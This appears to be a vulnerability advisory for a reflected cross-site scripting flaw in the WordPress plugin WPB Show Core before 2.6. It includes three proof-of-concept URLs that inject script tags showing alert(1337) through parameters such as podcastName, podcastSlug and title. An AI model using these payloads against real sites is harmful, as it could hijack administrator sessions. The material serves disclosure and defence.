WPB Show Core < 2.6 - Reflected XSS

2024-03-1800:00:00

Aly Khaled Aly Abd Al-aal

vulnerability

wpb show core

reflected xss

malicious script injection

podcastname

podcastslug

title

podcastimage

podcastimg_url

audioplayeroption

6 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

JSON

Description The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(1337)%3C/script%3E

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E//

https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-18-24%3Cscript%3Ealert(1337)%3C/script%3E&podcastName=Lightning+Thursdays&podCastImage=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podcastSlug=lightning-thursdays&siteurl=https%3A%2F%2Fwww.example.com&fileList%5B0%5D%5Bid%5D=49824&fileList%5B0%5D%5Bmp3%5D=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2024%2F01%2F18105309%2FLightning-TODAY-1-18-24.mp3&fileList%5B0%5D%5Btitle%5D=1-18-241-2%3Cscript%3Ealert(1337)%3C/script%3E&fileList%5B0%5D%5Bactual_mp3%5D=&blogid=874&rss_feed_link=https%3A%2F%2Fwww.example.com%2Fpodcast%2Flightning-thursdays%2Ffeed%2F%3Fpost_type%3Depisode&podImg_URL=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podCastId=78&episodeId=49824&audioPlayerOption=advance&gmf=-5&ckd=www.example.com&embedFlag=podcast